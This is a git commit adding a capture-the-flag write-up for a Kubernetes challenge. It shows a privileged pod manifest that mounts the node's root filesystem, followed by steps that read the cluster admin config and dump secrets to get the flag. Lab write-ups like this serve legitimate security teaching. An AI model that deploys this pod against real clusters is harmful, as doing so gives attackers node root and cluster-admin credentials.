aboutsummaryrefslogtreecommitdiff
path: root/punkctf/k8s_04.md
diff options
context:
space:
mode:
authorAria <me@aria.rip>2023-10-01 17:23:09 +0100
committerAria <me@aria.rip>2023-10-01 17:23:09 +0100
commitb5b9cf7a1f61d004d7d53584d029c19302c63ba0 (patch)
tree49c3022dccf669f9f2b905ddfbd2d16db2d10d84 /punkctf/k8s_04.md
initial commit
Diffstat (limited to 'punkctf/k8s_04.md')
-rw-r--r--punkctf/k8s_04.md50
1 files changed, 50 insertions, 0 deletions
diff --git a/punkctf/k8s_04.md b/punkctf/k8s_04.md
new file mode 100644
index 0000000..3212624
--- /dev/null
+++ b/punkctf/k8s_04.md
@@ -0,0 +1,50 @@
+
+Using `kubectl auth can-i --list` we find we still can't look at secrets directly, but we can create pods now.
+
+These pods don't have any security policy applied, meaning there are plenty of privesc routes we can take, most of them described [here](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation).
+
+Here is the pod i created:
+
+```yaml
+apiVersion: v1
+kind: Pod
+metadata:
+ name: everything-allowed-exec-pod
+ labels:
+ app: pentest
+spec:
+ hostNetwork: true
+ hostPID: true
+ hostIPC: true
+ containers:
+ - name: everything-allowed-pod
+ image: busybox
+ imagePullPolicy: IfNotPresent
+ securityContext:
+ privileged: true
+ volumeMounts:
+ - mountPath: /host
+ name: noderoot
+ command: [ "/bin/sh", "-c", "--" ]
+ args: [ "while true; do sleep 30; done;" ]
+ volumes:
+ - name: noderoot
+ hostPath:
+ path: /
+```
+
+We can then `kubectl exec -it pod/everything-allowed-exec-pod sh` and explore the host filesystem at `/host`.
+
+Looking in `/host/etc/kubernetes/admin.conf` (the standard location for the cluster admin config), we get connection details to login as cluster admin:
+
+```
+users:
+- name: kubernetes-admin
+ user:
+ client-certificate-data: <long base64 string>
+ client-key-data: <long base64 string>
+```
+
+We put this in our terminals `.kube/config`, and use it to enumerate the secrets with `kubectl get secret -A`
+
+We find a secret in the `kube-system` namespace, from which we get the flag `punk_{3WPF4FB37UMJV31D}`